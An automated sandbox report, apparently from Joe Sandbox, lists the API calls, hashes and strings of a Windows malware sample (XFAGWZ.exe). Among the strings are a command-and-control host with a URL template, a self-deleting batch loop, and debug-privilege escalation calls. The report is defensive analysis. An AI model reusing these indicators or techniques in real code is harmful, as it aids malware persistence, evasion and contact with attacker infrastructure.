                              • Part of subcall function 006B185B: srand.MSVCRT ref: 006B1878
                              • Part of subcall function 006B185B: rand.MSVCRT ref: 006B1880
                              • Part of subcall function 006B185B: srand.MSVCRT ref: 006B1890
                              • Part of subcall function 006B185B: rand.MSVCRT ref: 006B1894
                            • wsprintfA.USER32 ref: 006B15AA
                            • wsprintfA.USER32 ref: 006B15C6
                            • lstrlen.KERNEL32(?), ref: 006B15D2
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 006B15EE
                            • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 006B1609
                            • CloseHandle.KERNEL32(00000000), ref: 006B1612
                            • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 006B162D
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1891974235.00000000006B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006B0000, based on PE: true
                            • Associated: 00000001.00000002.1891955036.00000000006B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1891999307.00000000006B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892015252.00000000006B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892030158.00000000006B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b0000_XFAGWZ.jbxd
                            Similarity
                            • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                            • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\XFAGWZ.exe$open
                            • API String ID: 617340118-2456446415
                            • Opcode ID: 0f905bfa231bc3c732c932922fbe52123371f53a1bdd39ac67c8f462fc996263
                            • Instruction ID: f22e93c57d36cd931caf861c931c70640e19293b37a5ef3d45aaff6cc37b06ff
                            • Opcode Fuzzy Hash: 0f905bfa231bc3c732c932922fbe52123371f53a1bdd39ac67c8f462fc996263
                            • Instruction Fuzzy Hash: ED1151F2A011387AD720A7A89C89DEB7B6DDF5A750F010151F549E2241EA70ABC48BB0
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,006B1400), ref: 006B1226
                            • GetProcAddress.KERNEL32(00000000), ref: 006B122D
                            • GetCurrentProcessId.KERNEL32(?,?,?,?,006B1400), ref: 006B123F
                            • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,006B1400), ref: 006B1250
                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\XFAGWZ.exe,?,?,?,?,006B1400), ref: 006B129E
                            • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\XFAGWZ.exe,?,?,?,?,006B1400), ref: 006B12B0
                            • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\XFAGWZ.exe,?,?,?,?,006B1400), ref: 006B12F5
                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,006B1400), ref: 006B130A
                            Strings
                            • ZwQuerySystemInformation, xrefs: 006B1212
                            • ntdll.dll, xrefs: 006B1219
                            • C:\Users\user\AppData\Local\Temp\XFAGWZ.exe, xrefs: 006B1262
                            Memory Dump Source
                            • Source File: 00000001.00000002.1891974235.00000000006B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006B0000, based on PE: true
                            • Associated: 00000001.00000002.1891955036.00000000006B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1891999307.00000000006B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892015252.00000000006B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892030158.00000000006B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b0000_XFAGWZ.jbxd
                            Similarity
                            • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                            • String ID: C:\Users\user\AppData\Local\Temp\XFAGWZ.exe$ZwQuerySystemInformation$ntdll.dll
                            • API String ID: 1500695312-697355066
                            • Opcode ID: 6f055076b78a2874c9e0f664df0fa9b04a225687eff373ea548b447a65ea1e40
                            • Instruction ID: d8461c3fd15adc0600f5f65dc3954fb82785fc994923b09ec2d446b447e0fef1
                            • Opcode Fuzzy Hash: 6f055076b78a2874c9e0f664df0fa9b04a225687eff373ea548b447a65ea1e40
                            • Instruction Fuzzy Hash: A021C5B1745321BBD720AB65CC14BEBBBAAFF46B00F800A19F645DA340D770DAC487A5
                            APIs
                            • memset.MSVCRT ref: 006B18B1
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,74DF0F00,75BF8400), ref: 006B18D3
                            • CloseHandle.KERNEL32(I%k), ref: 006B18E9
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 006B18F0
                            • GetExitCodeProcess.KERNEL32(?,?), ref: 006B1901
                            • CloseHandle.KERNEL32(?), ref: 006B190A
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1891974235.00000000006B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006B0000, based on PE: true
                            • Associated: 00000001.00000002.1891955036.00000000006B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1891999307.00000000006B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892015252.00000000006B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892030158.00000000006B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b0000_XFAGWZ.jbxd
                            Similarity
                            • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                            • String ID: I%k
                            • API String ID: 876959470-2996373354
                            • Opcode ID: e9caf644a0ed963d7835191b6a2c552e1fecdd3c39675ccd8d45b40edd9baf23
                            • Instruction ID: 49c2b6425492ce4706b0d2ac349431b202b1a64dedbeebf43ee4e19c434124b0
                            • Opcode Fuzzy Hash: e9caf644a0ed963d7835191b6a2c552e1fecdd3c39675ccd8d45b40edd9baf23
                            • Instruction Fuzzy Hash: F60171B2A01168BBCB216B95DC48DDF7F7EEF85760F104121FA15A52A0D6315A98CBA0
                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75BF8400,http://%s:%d/%s/%s,?,?,?,006B1118), ref: 006B1867
                            • srand.MSVCRT ref: 006B1878
                            • rand.MSVCRT ref: 006B1880
                            • srand.MSVCRT ref: 006B1890
                            • rand.MSVCRT ref: 006B1894
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1891974235.00000000006B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006B0000, based on PE: true
                            • Associated: 00000001.00000002.1891955036.00000000006B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1891999307.00000000006B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892015252.00000000006B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892030158.00000000006B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b0000_XFAGWZ.jbxd
                            Similarity
                            • API ID: Timerandsrand$FileSystem
                            • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                            • API String ID: 4106363736-3273462101
                            • Opcode ID: 2c6ecfd726aabc01023900ceb5596c0874e1bfbb7c82caff80524b2d38430e3a
                            • Instruction ID: 61bca0c0d83c7aec7d317674f52b98e0d92996c80cbabe2ee10f08069bdc978b
                            • Opcode Fuzzy Hash: 2c6ecfd726aabc01023900ceb5596c0874e1bfbb7c82caff80524b2d38430e3a
                            • Instruction Fuzzy Hash: EEE092B7A00228BBD700A7A9EC4689EBBACDE84161B100626F600D3250E570F9848AB8
                            APIs
                            • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,74DEE800,?,?,006B29DB,?,00000001), ref: 006B26A7
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,74DEE800,?,?,006B29DB,?,00000001), ref: 006B26B5
                            • lstrlen.KERNEL32(?), ref: 006B26C4
                            • ??2@YAPAXI@Z.MSVCRT ref: 006B26CE
                            • lstrcpy.KERNEL32(00000004,?), ref: 006B26E3
                            • lstrcpy.KERNEL32(?,00000004), ref: 006B271F
                            • ??3@YAXPAX@Z.MSVCRT ref: 006B272D
                            • SetEvent.KERNEL32 ref: 006B273C
                            Memory Dump Source
                            • Source File: 00000001.00000002.1891974235.00000000006B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006B0000, based on PE: true
                            • Associated: 00000001.00000002.1891955036.00000000006B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1891999307.00000000006B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892015252.00000000006B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892030158.00000000006B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b0000_XFAGWZ.jbxd
                            Similarity
                            • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                            • String ID:
                            • API String ID: 41106472-0
                            • Opcode ID: 31aaf1158a73e27a46caa2a89e5650ecd8364eccea190fb6c9c2ec8c8e7d1830
                            • Instruction ID: 6b2a9595387e8d4ca5b187252087603f8049bfceb498fcc59a7dcad4ea42bef1
                            • Opcode Fuzzy Hash: 31aaf1158a73e27a46caa2a89e5650ecd8364eccea190fb6c9c2ec8c8e7d1830
                            • Instruction Fuzzy Hash: E5119DF6600221EFCB31AF15EC588DA7BEBFF847607105229F85887221DB3099C6CB64
                            APIs
                            Strings
                            • vfnaJezOdfAaMhbJFkqtjxUkAcIFrwHRbEhklryyBbpweoPoCSKyDdYujSWDhwnKiIVlWZFuNSmcRZRjPeDJsqrCNgWTItQGYuQPTapLOtCisMlLXNEXMAimKqpLfBYEgnsGoQTVvdUzHUBzZvXHcxOVmGgx, xrefs: 006B1B8A, 006B1B9C, 006B1C15, 006B1C49
                            • .exe, xrefs: 006B1C57
                            Memory Dump Source
                            • Source File: 00000001.00000002.1891974235.00000000006B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006B0000, based on PE: true
                            • Associated: 00000001.00000002.1891955036.00000000006B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1891999307.00000000006B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892015252.00000000006B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892030158.00000000006B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b0000_XFAGWZ.jbxd
                            Similarity
                            • API ID: lstrcatmemcpymemsetrandsrand
                            • String ID: .exe$vfnaJezOdfAaMhbJFkqtjxUkAcIFrwHRbEhklryyBbpweoPoCSKyDdYujSWDhwnKiIVlWZFuNSmcRZRjPeDJsqrCNgWTItQGYuQPTapLOtCisMlLXNEXMAimKqpLfBYEgnsGoQTVvdUzHUBzZvXHcxOVmGgx
                            • API String ID: 122620767-1398202897
                            • Opcode ID: a18e595f7849f0705b5dce1f90962b17ea08d7e9edb1e6d02a5490e01e50d16b
                            • Instruction ID: d1e2e44d2c06b93b2eda1d43c46cee4a67d45ecef3b5f3aec8d2535d27b0f7e0
                            • Opcode Fuzzy Hash: a18e595f7849f0705b5dce1f90962b17ea08d7e9edb1e6d02a5490e01e50d16b
                            • Instruction Fuzzy Hash: 3F216BE2F841A07ED36513356C60BED3F478FA3711F161199F6850F393DA6409C28364
                            APIs
                            • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\XFAGWZ.exe), ref: 006B13BC
                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 006B13DA
                            • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 006B1448
                              • Part of subcall function 006B119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\XFAGWZ.exe,?,?,?,?,?,?,006B13EF), ref: 006B11AB
                              • Part of subcall function 006B119F: OpenProcessToken.ADVAPI32(00000000,00000028,006B13EF,?,?,?,?,?,?,006B13EF), ref: 006B11BB
                              • Part of subcall function 006B119F: AdjustTokenPrivileges.ADVAPI32(006B13EF,00000000,?,00000010,00000000,00000000), ref: 006B11EB
                              • Part of subcall function 006B119F: CloseHandle.KERNEL32(006B13EF), ref: 006B11FA
                              • Part of subcall function 006B119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,006B13EF), ref: 006B1203
                            Strings
                            • SeDebugPrivilege, xrefs: 006B13D3
                            • C:\Users\user\AppData\Local\Temp\XFAGWZ.exe, xrefs: 006B13A8
                            Memory Dump Source
                            • Source File: 00000001.00000002.1891974235.00000000006B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006B0000, based on PE: true
                            • Associated: 00000001.00000002.1891955036.00000000006B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1891999307.00000000006B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892015252.00000000006B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892030158.00000000006B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b0000_XFAGWZ.jbxd
                            Similarity
                            • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                            • String ID: C:\Users\user\AppData\Local\Temp\XFAGWZ.exe$SeDebugPrivilege
                            • API String ID: 4123949106-785652698
                            • Opcode ID: 8c5084e0739a4b24c9b3388c71d1c870cb3e7a189950d9b5a14c1b1e2b7b0870
                            • Instruction ID: 773780bd64c6b52fc10032da2b5ca2849cee75950231b6cbbf97160c994b1b1e
                            • Opcode Fuzzy Hash: 8c5084e0739a4b24c9b3388c71d1c870cb3e7a189950d9b5a14c1b1e2b7b0870
                            • Instruction Fuzzy Hash: A831A2B1D40219FADF209BA58C65FEEBBFAEB45700F504169E504BA251E6305E85CB60
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 006B1334
                            • GetProcAddress.KERNEL32(00000000), ref: 006B133B
                            • memset.MSVCRT ref: 006B1359
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1891974235.00000000006B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006B0000, based on PE: true
                            • Associated: 00000001.00000002.1891955036.00000000006B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1891999307.00000000006B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892015252.00000000006B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892030158.00000000006B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b0000_XFAGWZ.jbxd
                            Similarity
                            • API ID: AddressHandleModuleProcmemset
                            • String ID: NtSystemDebugControl$ntdll.dll
                            • API String ID: 3137504439-2438149413
                            • Opcode ID: 8698611d055a9a5fd03f2576518cde1bc21253332446c7bfbad49e5d7307e39d
                            • Instruction ID: b1fb43ac9a666c7a9785906d47dd913bd0e80946d37f01c70528daa6bcc742ec
                            • Opcode Fuzzy Hash: 8698611d055a9a5fd03f2576518cde1bc21253332446c7bfbad49e5d7307e39d
                            • Instruction Fuzzy Hash: 68015EB164021DBFDB109F98AC959EFBBAEFB41314F40422AF901A5241E6709685CB51
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1891974235.00000000006B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006B0000, based on PE: true
                            • Associated: 00000001.00000002.1891955036.00000000006B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1891999307.00000000006B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892015252.00000000006B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892030158.00000000006B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b0000_XFAGWZ.jbxd
                            Similarity
                            • API ID: strrchr$lstrcmpilstrcpylstrlen
                            • String ID:
                            • API String ID: 3636361484-0
                            • Opcode ID: 117ada92f5198a8d2763442b19817c86cbc839a8fef22230d66ac0c25f1c36c7
                            • Instruction ID: e011d2600078e206a81fa4b909f638fa56a371cd5e212e817dca64e6aac9ca70
                            • Opcode Fuzzy Hash: 117ada92f5198a8d2763442b19817c86cbc839a8fef22230d66ac0c25f1c36c7
                            • Instruction Fuzzy Hash: B101FEF29042297FDF106B60DC48BD677DEDF05310F440065DA45D7190DA74EAC58BA0
                            APIs
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 006B603C
                            • GetProcAddress.KERNEL32(00000000,006B6064), ref: 006B604F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1892030158.00000000006B6000.00000040.00000001.01000000.00000004.sdmp, Offset: 006B0000, based on PE: true
                            • Associated: 00000001.00000002.1891955036.00000000006B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1891974235.00000000006B1000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1891999307.00000000006B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892015252.00000000006B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b0000_XFAGWZ.jbxd
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: kernel32.dll
                            • API String ID: 1646373207-1793498882
                            • Opcode ID: 2d93b5ea8f83f232fddef99cde320155cbc7363fd93844499ddde55f6dc2c5d9
                            • Instruction ID: cadc6db7b8a3acaec17ad282e7558cfedf01e843142190d75ee598d19c92e19a
                            • Opcode Fuzzy Hash: 2d93b5ea8f83f232fddef99cde320155cbc7363fd93844499ddde55f6dc2c5d9
                            • Instruction Fuzzy Hash: E4F0F0F21442899FEF70CEA4CC84BDE3BE5EB15700F50442AFA09CB281CB7886858B24